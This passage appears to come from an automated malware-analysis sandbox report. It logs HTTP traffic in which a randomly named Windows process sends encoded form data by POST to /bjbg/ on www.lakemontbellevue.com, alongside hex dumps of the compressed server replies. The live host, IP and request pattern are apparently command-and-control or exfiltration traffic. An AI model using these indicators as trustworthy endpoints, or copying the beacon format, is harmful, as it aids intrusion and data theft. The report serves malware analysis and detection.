                                                            Data Raw: 32 61 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 7d 6d 77 db 36 b2 f0 e7 e4 57 30 ca 69 6a 2d 29 59 92 5f 63 57 e9 c6 76 ec a4 b1 13 af e5 b4 4f 6f d3 d3 03 91 23 11 16 08 30 00 28 59 f1 f5 7f 7f ce 0c 48 8a b2 e5 b7 38 dd de ec d6 1c 80 c0 cc 60 30 18 cc 00 20 f4 d3 b3 bd 8f bb a7 bf 1f bf f1 62 9b 88 57 4f 7f c2 87 27 98 1c 76 6b 20 1b 9f 7a 35 cc 03 16 bd 7a e2 3d 7d f2 53 02 96 79 b1 b5 69 03 be 64 7c dc ad fd bf c6 a7 d7 8d 5d 95 a4 cc f2 be 80 9a 17 2a 69 41 da 6e ed dd 9b 2e 44 43 a8 bd 2a aa 49 96 40 b7 36 e6 30 49 95 b6 95 92 13 1e d9 b8 1b c1 98 87 d0 a0 44 e0 71 c9 2d 67 a2 61 42 26 a0 db 9e 61 09 63 a6 0d d8 6e ed d3 e9 7e 63 b3 f6 ea e9 1c fa 1f b5 ea 2b 6b 7e 2c 91 ff 28 15 97 11 9c 07 de 40 09 a1 26 3f 7a cb 54 e5 59 a3 e1 9d c6 dc 78 86 5b f0 b8 f1 54 6a 79 c2 bf 42 e4 4d b8 8d 3d 1b 83 f7 bb 62 c6 7a bd 37 1f bd 54 64 43 2e bd 71 67 a5 d9 f2 1a 24 00 b3 b5 bc 3c c5 02 cd 50 25 cb 13 a5 a3 54 83 31 cb ae a8 59 36 a0 96 bd 46 03 f9 b6 dc 0a 78 75 cc 86 e0 49 65 bd 81 ca 64 e4 35 bc [TRUNCATED]
                                                            Data Ascii: 2ae3}mw6W0ij-)Y_cWvOo#0(YH8`0 bWO'vk z5z=}Syid|]*iAn.DC*I@60IDq-gaB&acn~c+k~,(@&?zTYx[TjyBM=bz7TdC.qg$<P%T1Y6FxuIed5C6DI$$S1*r%ZvZ[S-P,Sm[T0UJ?BWp5Og)tk,M3BHP4VWJnqQ7m~~[<9}4%W:F2A-rL!O"TxV^m/}<5*m<
                                                            Jul 3, 2024 17:37:45.422154903 CEST1289INData Raw: eb 4f 6f a0 d0 f4 ee 20 8b 43 03 b5 0d b1 70 e9 ed e4 0d 0f bc df 98 89 b9 1c 5a 25 9b b5 a0 96 66 7d c1 4d 0c ba b6 75 71 2f 09 2b 3d 64 92 7f 75 82 b9 0c 6a a9 42 f5 e1 4c bc 0e 9d 74 2a 7d d7 03 a6 c3 38 7f 11 d4 2c d3 43 b0 44 28 2f f0 46 5a
                                                            Data Ascii: Oo CpZ%f}Muq/+=dujBLt*}8,CD(/FZ==V\ZcYM,/c5KKz2P4Z;32.j\29:yXmqp!_BUU63Qs?9\o5')8&i#7'Y*rY]n-mojf*?v:
                                                            Jul 3, 2024 17:37:45.422231913 CEST1289INData Raw: 25 ce 1b 2a ad 05 ac 89 ee 55 b7 b6 de 6a 79 2b 9d f4 dc 7b ad 39 13 b5 e0 e2 b2 1c 1d d0 1c 28 fd 86 85 71 65 7c d4 2f d4 1f f0 67 d7 2e b1 00 02 59 47 02 33 39 59 7c ef 0c c7 35 ee f3 39 aa be 6d 9b 46 87 5d 08 6c 33 82 01 e8 ee b3 56 c0 9b b8
                                                            Data Ascii: %*Ujy+{9(qe|/g.YG39Y|59mF]l3Vdi2lrJ/T6ITgnDVfnMuY+}02~99&7c3Rm \(u3^Y'/-sfttef3CK5n!'x&
                                                            Jul 3, 2024 17:37:45.422338963 CEST1289INData Raw: d2 b4 fa ed 32 8b ce 0e 99 08 97 9a eb eb 38 c1 fa 5e 27 3d af 7b 94 d5 6e ae ac ac 94 79 db 95 b1 d9 6c a3 7a 5c ce b8 c6 96 fd f5 97 e3 fd a2 32 e3 16 4c 56 1a b2 88 95 aa 82 cd 24 3d a4 f0 ff 5e 22 ee ab 68 7a d1 68 4c d2 06 ee 70 18 b0 0d 27
                                                            Data Ascii: 28^'={nylz\2LV$=^"hzhLp'F/X82F_da>~3\Y\|s\X`I Hz|h{:Dp2WPaMRaUUEk1t$ly7Q_V\E(M6+r[4/
                                                            Jul 3, 2024 17:37:45.422426939 CEST1289INData Raw: 96 ee 43 e0 be e3 f1 a6 8d 85 c7 31 f8 10 4a f7 b6 55 d5 7d 87 ef c9 de 02 f4 8b 74 ec ee ed 88 c7 e9 d9 dd f8 17 cd a1 8b 76 29 1e c5 c7 42 8c 0b fd 81 ab fb 0b 8f 22 7b 1d dd 8d 34 8b 5d 86 ef 40 af 40 75 9b 0e e2 be c2 f7 51 37 c4 74 93 9d a7
                                                            Data Ascii: C1JU}tv)B"{4]@@uQ7tmGY@c~QtQ-Ul<Jd~w\YV"~iwt9=![1/Y9",_hq.cSO;9_2e$e{:Rmo(V_)kfi#|,:d$g
                                                            Jul 3, 2024 17:37:45.422496080 CEST1289INData Raw: cb 8a f8 c8 01 c3 91 eb 16 29 39 f8 9f 0c f8 bf ab 4c fb a7 20 c0 e0 65 45 f4 4a c9 69 a2 32 53 74 15 de 97 57 3c fd 3d 1e 29 27 32 4a a2 0c 5d 42 91 7c 34 4b 81 5a a9 fb 99 cd cc 0c 2a 4b ea 10 4f 8f 84 d6 f8 7b 2c 1b c6 16 74 91 3b 56 fe 0e 9e
                                                            Data Ascii: )9L eEJi2StW<=)'2J]B|4KZ*KO{,t;V?PD0O/Zy#e<+:&IC[>S R p4'lrg2asKmB(Jx<vM"&<r+VTj4g05r$I2sEQRI^.J4fI?ccD
                                                            Jul 3, 2024 17:37:45.422569036 CEST1289INData Raw: 66 61 5f 63 43 78 38 62 be 8d c1 3f d0 6e 0e c2 6c 35 2a d9 d3 00 85 38 34 18 d2 9f 7d cd cf 94 70 6f b3 91 cd 50 97 f6 b3 21 fb 9a d7 39 d8 ef 91 6f 6e 73 f8 03 a8 18 9d 30 49 c3 e9 80 f5 35 07 9a 57 0e d8 c0 0d ab 03 26 5c 74 70 c0 44 04 ce 6f
                                                            Data Ascii: fa_cCx8b?nl5*84}poP!9ons0I5W&\tpDo;`qCRJ+!}Ny haF!ZU)/1aLY@wt-3fh~ncfQ7}tyx_ybT|df
                                                            Jul 3, 2024 17:37:45.422631025 CEST1289INData Raw: 16 1f 69 ae 84 2a 93 96 71 69 30 7e dd 8d d1 f2 25 cc 61 c8 0c f8 47 90 28 4e 26 e1 48 fb 3b 10 e1 32 85 4b ec b1 81 82 1c c4 55 b6 31 cf 27 e9 23 8d 33 0f 97 d6 df 03 c1 06 1c 44 99 1b 43 9a 32 4d ab 67 14 be f9 bf 32 b7 9a 78 94 39 66 a6 38 8e
                                                            Data Ascii: i*qi0~%aG(N&H;2KU1'#3DC2Mg2x9f820H,0>ITwn\IbIB0|#\C>hwU&"Ol"4*yAPcRlJ)ib)nL-^?Y47:O
                                                            Jul 3, 2024 17:37:45.422699928 CEST1289INData Raw: 1c 57 97 24 9f b5 da 52 88 51 15 bb 45 27 fa 93 b0 9a cd 59 94 6a 7e 65 6f be 67 d5 c8 21 d2 8c 16 65 7a 19 f8 6f 70 f1 da ad 4d 71 67 45 7a 19 14 ab dd 3d f4 26 89 af 0c 77 93 a4 eb b3 2c 05 9d 80 0e 59 a4 ca 72 9a e5 0f 29 0b 08 db 47 5d 9b 4d
                                                            Data Ascii: W$RQE'Yj~eog!ezopMqgEz=&w,Yr)G]M07]G^BG$2Tk)p)KJpl5;CszS;+)p-h-pNa|"<8XBO5.%E0kE+Zas(TOGNYN3~Ck%0yV
                                                            Jul 3, 2024 17:37:45.422748089 CEST97INData Raw: 9a 0d 3d bc 17 29 d2 2a f5 52 7c d9 cf 5f 0e 94 f6 4a 9b d7 ac 2d 13 45 77 83 54 65 82 0a 8d a9 bd 22 49 17 d7 15 b8 0b a2 66 d7 17 cc dd 11 45 25 17 dc 13 45 f9 77 dc 15 35 eb b4 27 4f 9e 54 c5 b0 90 29 9a c1 72 a7 a0 6a 22 89 5f bc 66 a0 79 ed
                                                            Data Ascii: =)*R|_J-EwTe"IfE%Ew5'OT)rj"_fywz
                                                            Jul 3, 2024 17:37:45.460165977 CEST1289INData Raw: 31 63 66 32 0d 0a d4 3d ed 72 db 38 92 bf c5 aa 7b 07 0c 5d bb 89 53 22 25 51 92 15 3b b6 b6 32 4e 66 37 57 f9 aa 49 a6 e6 47 66 4a 05 91 90 c5 84 12 b9 24 25 c5 33 eb 07 ba 3f f7 10 fb 64 57 dd 00 48 90 04 29 c9 a1 67 6f ec 4a 4c 12 8d 46 03 68
                                                            Data Ascii: 1cf2=r8{]S"%Q;2Nf7WIGfJ$%3?dWH)goJLFhF;/SY}{6k:ss8"YE>kAx9ZmWC4V %$/2c4ysop%pp|WH\nGr%a`(a@(u&@3PP"l


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.11.204979266.235.200.145807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:37:47.657325983 CEST1146OUTPOST /bjbg/ HTTP/1.1
                                                            Host: www.lakemontbellevue.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.lakemontbellevue.com
                                                            Referer: http://www.lakemontbellevue.com/bjbg/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 43 59 73 6c 6f 57 45 64 6f 62 4a 57 76 37 66 78 58 30 30 33 48 6f 62 50 7a 31 4e 66 7a 73 35 54 64 72 34 71 6b 62 68 72 65 34 6d 6a 6e 35 4c 35 70 77 35 68 6c 71 57 2f 78 35 6b 75 4a 47 74 34 49 4c 77 43 51 2b 49 36 38 2b 71 71 58 32 64 79 55 5a 4e 46 49 4d 62 4e 30 2f 79 44 58 32 4f 38 6c 6f 79 31 4e 35 69 51 32 4a 51 59 79 71 33 38 72 62 72 58 44 54 50 35 78 48 47 6f 71 6b 61 66 45 65 4c 38 45 77 77 6e 46 6b 58 49 6c 65 74 72 75 4d 53 46 73 57 48 65 39 56 30 7a 49 38 36 69 32 4e 46 48 78 43 50 68 44 4e 2b 30 67 69 46 74 38 64 30 77 66 73 59 4c 74 63 4e 48 76 4c 59 36 68 42 6f 62 44 32 74 62 4d 4b 52 75 53 5a 66 7a 2b 72 44 63 53 2f 4c 55 44 74 30 48 57 52 6e 6f 6f 30 78 55 78 6c 2f 4c 74 66 6d 55 50 68 64 41 75 75 54 6b 38 56 45 45 49 55 51 53 65 62 55 5a 38 64 44 33 44 34 72 47 5a 2f 41 7a 65 5a 6a 4b 65 50 73 49 4b 77 5a 50 33 62 2f 7a 62 44 4a 42 70 43 6f 48 67 4e 76 45 33 77 67 65 57 58 2b 49 2f 45 39 42 67 79 61 57 54 34 79 56 72 49 2f 50 56 73 51 46 45 4c 37 31 46 78 4e 47 5a 65 62 [TRUNCATED]
                                                            Data Ascii: vX=CYsloWEdobJWv7fxX003HobPz1Nfzs5Tdr4qkbhre4mjn5L5pw5hlqW/x5kuJGt4ILwCQ+I68+qqX2dyUZNFIMbN0/yDX2O8loy1N5iQ2JQYyq38rbrXDTP5xHGoqkafEeL8EwwnFkXIletruMSFsWHe9V0zI86i2NFHxCPhDN+0giFt8d0wfsYLtcNHvLY6hBobD2tbMKRuSZfz+rDcS/LUDt0HWRnoo0xUxl/LtfmUPhdAuuTk8VEEIUQSebUZ8dD3D4rGZ/AzeZjKePsIKwZP3b/zbDJBpCoHgNvE3wgeWX+I/E9BgyaWT4yVrI/PVsQFEL71FxNGZebaffPvLVGBZZCmEdqo58UVDD0mhUqh/3K68V+TIbfuaRUOtc5IUk50inpmZJRLwZQIHdvyEGQCdT/pvm+6FSSROVOhUu0FsXsuYGC491iKZFA8NXiPITQWxKLbjbXJDwfD1FV6o9yrtse/dlthbiTmsdd6tLtDSH2NybnrtY0vJCCcLxXFRSg7Jd/GUHbYqbPvgWL+Hgk=
                                                            Jul 3, 2024 17:37:48.003277063 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:37:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://lakemontbellevue.net/wp-json/>; rel="https://api.w.org/"
                                                            Vary: Accept-Encoding
                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                            X-Newfold-Cache-Level: 2
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            CF-Cache-Status: DYNAMIC
                                                            Set-Cookie: _cfuvid=q78Vdp1Tqcep1iwnGWiwInnpBJxldweYeAbg4IJrKkQ-1720021067938-0.0.1.1-604800000; path=/; domain=.www.lakemontbellevue.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f5793b9861c2-ORD
                                                            Content-Encoding: gzip
                                                            Data Raw: 32 61 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 7d 6d 77 db 36 b2 f0 e7 e4 57 30 ca 69 6a 2d 29 59 92 5f 63 57 e9 c6 76 ec a4 b1 13 af e5 b4 4f 6f d3 d3 03 91 23 11 16 08 30 00 28 59 f1 f5 7f 7f ce 0c 48 8a b2 e5 b7 38 dd de ec d6 1c 80 c0 cc 60 30 18 cc 00 20 f4 d3 b3 bd 8f bb a7 bf 1f bf f1 62 9b 88 57 4f 7f c2 87 27 98 1c 76 6b 20 1b 9f 7a 35 cc 03 16 bd 7a e2 3d 7d f2 53 02 96 79 b1 b5 69 03 be 64 7c dc ad fd bf c6 a7 d7 8d 5d 95 a4 cc f2 be 80 9a 17 2a 69 41 da 6e ed dd 9b 2e 44 43 a8 bd 2a aa 49 96 40 b7 36 e6 30 49 95 b6 95 92 13 1e d9 b8 1b c1 98 87 d0 a0 44 e0 71 c9 2d 67 a2 61 42 26 a0 db 9e 61 09 63 a6 0d d8 6e ed d3 e9 7e 63 b3 f6 ea e9 1c fa 1f b5 ea 2b 6b 7e 2c 91 ff 28 15 97 11 9c 07 de 40 09 a1 26 3f 7a cb 54 e5 59 a3 e1 9d c6 dc 78 86 5b f0 b8 f1 54 6a 79 c2 bf 42 e4 4d b8 8d 3d 1b 83 f7 bb 62 c6 7a bd 37 1f bd 54 64 43 2e bd 71 67 a5 d9 f2 1a 24 00 b3 b5 bc 3c c5 02 cd 50 25 cb 13 a5 a3 54 83 31 cb ae a8 59 36 a0 96 bd 46 03 f9 b6 dc 0a 78 75 cc 86 e0 49 65 bd 81 ca 64 e4 35 bc [TRUNCATED]
                                                            Data Ascii: 2ae3}mw6W0ij-)Y_cWvOo#0(YH8`0 bWO'vk z5z=}Syid|]*iAn.DC*I@60IDq-gaB&acn~c+k~,(@&?zTYx[TjyBM=bz7TdC.qg$<P%T1Y6FxuIed5C6DI$$S1*r%ZvZ[S-P,Sm[T0UJ?BWp5Og)tk,M3BHP4VWJnqQ7m~~[<9}4%W:F2A-rL!O"TxV^m/}<5*m<
                                                            Jul 3, 2024 17:37:48.003293037 CEST1289INData Raw: eb 4f 6f a0 d0 f4 ee 20 8b 43 03 b5 0d b1 70 e9 ed e4 0d 0f bc df 98 89 b9 1c 5a 25 9b b5 a0 96 66 7d c1 4d 0c ba b6 75 71 2f 09 2b 3d 64 92 7f 75 82 b9 0c 6a a9 42 f5 e1 4c bc 0e 9d 74 2a 7d d7 03 a6 c3 38 7f 11 d4 2c d3 43 b0 44 28 2f f0 46 5a
                                                            Data Ascii: Oo CpZ%f}Muq/+=dujBLt*}8,CD(/FZ==V\ZcYM,/c5KKz2P4Z;32.j\29:yXmqp!_BUU63Qs?9\o5')8&i#7'Y*rY]n-mojf*?v:
                                                            Jul 3, 2024 17:37:48.003329039 CEST1289INData Raw: 25 ce 1b 2a ad 05 ac 89 ee 55 b7 b6 de 6a 79 2b 9d f4 dc 7b ad 39 13 b5 e0 e2 b2 1c 1d d0 1c 28 fd 86 85 71 65 7c d4 2f d4 1f f0 67 d7 2e b1 00 02 59 47 02 33 39 59 7c ef 0c c7 35 ee f3 39 aa be 6d 9b 46 87 5d 08 6c 33 82 01 e8 ee b3 56 c0 9b b8
                                                            Data Ascii: %*Ujy+{9(qe|/g.YG39Y|59mF]l3Vdi2lrJ/T6ITgnDVfnMuY+}02~99&7c3Rm \(u3^Y'/-sfttef3CK5n!'x&
                                                            Jul 3, 2024 17:37:48.003422976 CEST1289INData Raw: d2 b4 fa ed 32 8b ce 0e 99 08 97 9a eb eb 38 c1 fa 5e 27 3d af 7b 94 d5 6e ae ac ac 94 79 db 95 b1 d9 6c a3 7a 5c ce b8 c6 96 fd f5 97 e3 fd a2 32 e3 16 4c 56 1a b2 88 95 aa 82 cd 24 3d a4 f0 ff 5e 22 ee ab 68 7a d1 68 4c d2 06 ee 70 18 b0 0d 27
                                                            Data Ascii: 28^'={nylz\2LV$=^"hzhLp'F/X82F_da>~3\Y\|s\X`I Hz|h{:Dp2WPaMRaUUEk1t$ly7Q_V\E(M6+r[4/
                                                            Jul 3, 2024 17:37:48.003436089 CEST1289INData Raw: 96 ee 43 e0 be e3 f1 a6 8d 85 c7 31 f8 10 4a f7 b6 55 d5 7d 87 ef c9 de 02 f4 8b 74 ec ee ed 88 c7 e9 d9 dd f8 17 cd a1 8b 76 29 1e c5 c7 42 8c 0b fd 81 ab fb 0b 8f 22 7b 1d dd 8d 34 8b 5d 86 ef 40 af 40 75 9b 0e e2 be c2 f7 51 37 c4 74 93 9d a7
                                                            Data Ascii: C1JU}tv)B"{4]@@uQ7tmGY@c~QtQ-Ul<Jd~w\YV"~iwt9=![1/Y9",_hq.cSO;9_2e$e{:Rmo(V_)kfi#|,:d$g
                                                            Jul 3, 2024 17:37:48.003448009 CEST1289INData Raw: cb 8a f8 c8 01 c3 91 eb 16 29 39 f8 9f 0c f8 bf ab 4c fb a7 20 c0 e0 65 45 f4 4a c9 69 a2 32 53 74 15 de 97 57 3c fd 3d 1e 29 27 32 4a a2 0c 5d 42 91 7c 34 4b 81 5a a9 fb 99 cd cc 0c 2a 4b ea 10 4f 8f 84 d6 f8 7b 2c 1b c6 16 74 91 3b 56 fe 0e 9e
                                                            Data Ascii: )9L eEJi2StW<=)'2J]B|4KZ*KO{,t;V?PD0O/Zy#e<+:&IC[>S R p4'lrg2asKmB(Jx<vM"&<r+VTj4g05r$I2sEQRI^.J4fI?ccD
                                                            Jul 3, 2024 17:37:48.003459930 CEST1289INData Raw: 66 61 5f 63 43 78 38 62 be 8d c1 3f d0 6e 0e c2 6c 35 2a d9 d3 00 85 38 34 18 d2 9f 7d cd cf 94 70 6f b3 91 cd 50 97 f6 b3 21 fb 9a d7 39 d8 ef 91 6f 6e 73 f8 03 a8 18 9d 30 49 c3 e9 80 f5 35 07 9a 57 0e d8 c0 0d ab 03 26 5c 74 70 c0 44 04 ce 6f
                                                            Data Ascii: fa_cCx8b?nl5*84}poP!9ons0I5W&\tpDo;`qCRJ+!}Ny haF!ZU)/1aLY@wt-3fh~ncfQ7}tyx_ybT|df
                                                            Jul 3, 2024 17:37:48.003472090 CEST1289INData Raw: 16 1f 69 ae 84 2a 93 96 71 69 30 7e dd 8d d1 f2 25 cc 61 c8 0c f8 47 90 28 4e 26 e1 48 fb 3b 10 e1 32 85 4b ec b1 81 82 1c c4 55 b6 31 cf 27 e9 23 8d 33 0f 97 d6 df 03 c1 06 1c 44 99 1b 43 9a 32 4d ab 67 14 be f9 bf 32 b7 9a 78 94 39 66 a6 38 8e
                                                            Data Ascii: i*qi0~%aG(N&H;2KU1'#3DC2Mg2x9f820H,0>ITwn\IbIB0|#\C>hwU&"Ol"4*yAPcRlJ)ib)nL-^?Y47:O
                                                            Jul 3, 2024 17:37:48.003484011 CEST1289INData Raw: 1c 57 97 24 9f b5 da 52 88 51 15 bb 45 27 fa 93 b0 9a cd 59 94 6a 7e 65 6f be 67 d5 c8 21 d2 8c 16 65 7a 19 f8 6f 70 f1 da ad 4d 71 67 45 7a 19 14 ab dd 3d f4 26 89 af 0c 77 93 a4 eb b3 2c 05 9d 80 0e 59 a4 ca 72 9a e5 0f 29 0b 08 db 47 5d 9b 4d
                                                            Data Ascii: W$RQE'Yj~eog!ezopMqgEz=&w,Yr)G]M07]G^BG$2Tk)p)KJpl5;CszS;+)p-h-pNa|"<8XBO5.%E0kE+Zas(TOGNYN3~Ck%0yV
                                                            Jul 3, 2024 17:37:48.003494024 CEST97INData Raw: 9a 0d 3d bc 17 29 d2 2a f5 52 7c d9 cf 5f 0e 94 f6 4a 9b d7 ac 2d 13 45 77 83 54 65 82 0a 8d a9 bd 22 49 17 d7 15 b8 0b a2 66 d7 17 cc dd 11 45 25 17 dc 13 45 f9 77 dc 15 35 eb b4 27 4f 9e 54 c5 b0 90 29 9a c1 72 a7 a0 6a 22 89 5f bc 66 a0 79 ed
                                                            Data Ascii: =)*R|_J-EwTe"IfE%Ew5'OT)rj"_fywz
                                                            Jul 3, 2024 17:37:48.003906012 CEST1289INData Raw: 64 30 64 0d 0a d4 1d 6b 6f e3 36 f2 b3 f4 2b 58 15 e8 63 11 d9 96 2c cb b1 6b ab d8 6e b3 6d 80 6c b6 e8 ee a1 1f 0e 07 83 96 e9 58 17 59 14 24 d9 4e 0a e4 bf 1f 66 48 51 d4 cb c9 a2 69 81 4b 3e 58 12 87 e4 90 1c ce 83 8f 99 aa 4e 4d 38 c1 09 8f
                                                            Data Ascii: d0dko6+Xc,knmlXY$NfHQiK>XNM8FSYCw;rh23lc|s+W x}Vsf3D"spI{w?%9e`k91mS0=KPr5OQe@O2t?dD'S


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.11.204979366.235.200.145807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:37:50.326550961 CEST2578OUTPOST /bjbg/ HTTP/1.1
                                                            Host: www.lakemontbellevue.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.lakemontbellevue.com
                                                            Referer: http://www.lakemontbellevue.com/bjbg/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 43 59 73 6c 6f 57 45 64 6f 62 4a 57 76 37 66 78 58 30 30 33 48 6f 62 50 7a 31 4e 66 7a 73 35 54 64 72 34 71 6b 62 68 72 65 34 2b 6a 6e 4c 7a 35 70 54 68 68 30 61 57 2f 76 70 6b 56 4a 47 73 6b 49 4c 70 4b 51 37 52 50 38 38 53 71 57 68 42 79 55 71 31 46 4e 4d 62 4f 6f 50 79 42 64 57 4f 6f 6c 6f 2f 30 4e 35 33 76 78 38 45 59 7a 74 7a 38 73 74 6a 55 4c 6a 50 37 78 48 48 6e 37 55 61 74 45 65 50 53 45 77 30 6e 46 6e 6a 49 6b 73 56 72 6f 4e 53 46 6c 6d 48 64 6b 46 30 67 47 63 36 48 32 4e 52 79 78 43 50 62 44 4d 4b 30 67 68 64 74 39 66 63 7a 59 4d 59 4c 6b 38 4e 45 72 4c 63 32 68 42 31 59 44 32 70 62 4d 4b 70 75 53 35 66 7a 73 65 2f 62 46 76 4c 6f 48 74 31 66 53 52 72 67 6f 30 31 71 78 6b 62 4c 74 76 79 55 4f 53 46 41 6f 4b 50 6b 37 46 45 52 56 6b 52 59 58 37 55 56 38 62 6a 64 44 35 4b 78 5a 38 4d 7a 4d 6f 44 4b 62 72 41 4a 4a 51 5a 42 79 62 2b 33 52 6a 4e 37 70 43 34 68 67 4e 76 55 33 78 6b 65 57 48 75 49 74 46 39 4f 69 69 61 56 5a 6f 7a 56 77 34 6a 2f 56 73 64 49 45 4c 65 34 46 77 4a 47 5a 2b 62 [TRUNCATED]
                                                            Data Ascii: vX=CYsloWEdobJWv7fxX003HobPz1Nfzs5Tdr4qkbhre4+jnLz5pThh0aW/vpkVJGskILpKQ7RP88SqWhByUq1FNMbOoPyBdWOolo/0N53vx8EYztz8stjULjP7xHHn7UatEePSEw0nFnjIksVroNSFlmHdkF0gGc6H2NRyxCPbDMK0ghdt9fczYMYLk8NErLc2hB1YD2pbMKpuS5fzse/bFvLoHt1fSRrgo01qxkbLtvyUOSFAoKPk7FERVkRYX7UV8bjdD5KxZ8MzMoDKbrAJJQZByb+3RjN7pC4hgNvU3xkeWHuItF9OiiaVZozVw4j/VsdIELe4FwJGZ+bab83oDlHoEpDhJ9r+58YzDBYMgkGh5H664F+QO7fqQxVL+M5IUkFeinlmZclL/JgIXeHyImRLdT+tvm6/FSq7OWX0Us4FiiAuUju7r1iTdFANTnucIS8kxKbxjsvJCwPDxFV54NyossfkLVR9biORsdBqtMxDSDbPh/7j0Lo3U26KBgX1fwlHZ8nfQAeJpKPBxVD/QV1ifPBNquF2vB6iEfAVOPEvpH2kY55pcV1Kvqfp/CzoqMJwfiZhFz90f2QCqbod+UAf2jUFSDgxuJpP1YCWIRh5Rg6Sd67SOEldwIGu9HiLnIa/XtoU44h8LwqZI/RBEQzAcMvBoemKBeJHmdO37x0fse7lspew2n/yeYcGt+3cspGHnj1HnbcVfVYm7X5YRZ+15IunzktET2uy/ATFhyv4c8RIEnsw+bU39Gy2BWlALXScTVBSaMgpGU8ShTQKmS7wGSpL6bOERcRciNvfZMGA+b2UeOGou5kdAt7NwapW+vdLYZCBQcVrRromm6uA1TdJla+DERfRAn+Tkk6hqInLZTetuoqqjebiK78Y5dE53dpsuKxQKYREUsaOr7YZva2lpoz8heSICxk0swukIB03dG3Z2IgutWlx3vgKPR0CkPoXXCVZx7uBZpVoSB34lCxs6YJ7gSh41Oc/zxf9tIdMxUuNE [TRUNCATED]
                                                            Jul 3, 2024 17:37:50.326569080 CEST5156OUTData Raw: 41 6e 73 57 64 66 38 63 64 35 56 75 75 47 4d 49 4b 56 48 72 39 73 38 42 37 50 65 48 79 4e 5a 72 38 79 55 75 4a 58 78 46 76 56 74 55 6f 4d 38 6d 45 57 4f 51 66 44 78 7a 2f 6b 52 6c 34 61 6e 79 49 55 48 4e 44 35 77 46 5a 47 41 71 71 51 2f 76 59 6d
                                                            Data Ascii: AnsWdf8cd5VuuGMIKVHr9s8B7PeHyNZr8yUuJXxFvVtUoM8mEWOQfDxz/kRl4anyIUHND5wFZGAqqQ/vYmMrXvCZ7c2ZCD3N+y7TmiuL1d6Iaml67EB3FT69u2Kvk+IDHhtlDQUW4fFyvlk1HCPMkhW8AXfDedRfmNWIy0DNeRw3LzIrBuRBQOA6W8r7aYwxL6YUBI+VvpcsAHWgZoYEQxGQq3zizeCRdUjByDCOtshVHpG1QXT
                                                            Jul 3, 2024 17:37:50.326649904 CEST5156OUTData Raw: 4c 75 37 4b 35 41 4d 63 6c 41 4a 64 51 6d 53 51 50 64 46 2f 41 36 78 31 58 32 47 76 66 75 34 39 4c 51 44 74 62 76 4b 2b 57 58 30 2b 67 32 54 63 6d 4f 74 69 2f 35 4f 74 74 4b 64 32 45 38 53 6d 76 4f 32 37 6c 45 4d 71 77 77 66 66 34 41 50 6c 66 41
                                                            Data Ascii: Lu7K5AMclAJdQmSQPdF/A6x1X2Gvfu49LQDtbvK+WX0+g2TcmOti/5OttKd2E8SmvO27lEMqwwff4APlfA0Zex45+3yPNHLZws4VMjqsSE5uXwNcavnDrvBfYXcH0KdpFRGsUe+idQMlZmEmrthe1rGL8VnUgPUK7ecL76BNbG5s/EHlSxK7qHBdBT/GYOO7VK0FR2XXceNC2wc9SvgGcbmF3F/1gj6KFz97JNGmTGhKlSEideU
                                                            Jul 3, 2024 17:37:50.445382118 CEST2578OUTData Raw: 52 4e 4b 4c 74 49 55 47 62 46 31 64 6a 76 62 71 36 2b 70 64 66 6a 6b 4e 39 38 58 49 2b 47 58 55 43 58 34 73 49 31 71 4f 39 30 49 58 6f 43 77 4c 36 69 41 75 73 6d 65 4e 42 33 61 6f 52 72 5a 68 38 58 69 43 4c 4c 53 51 67 6a 42 65 35 64 6f 75 59 78
                                                            Data Ascii: RNKLtIUGbF1djvbq6+pdfjkN98XI+GXUCX4sI1qO90IXoCwL6iAusmeNB3aoRrZh8XiCLLSQgjBe5douYxREa2L9R2H/24kC6dBsufDsP4suD5cY67etTFlAjGrF/MMPBHXbUuA9D1feYhJKHheh7RZ+zTvykDsJ4XeqBA7NSZjOSnx4dnvXq955rm9LQ5zmITRHQD2M2uJLQJzVZJqdN/qV6Fv5evmp+Y1hd2VA1wG0JIL/AVZ
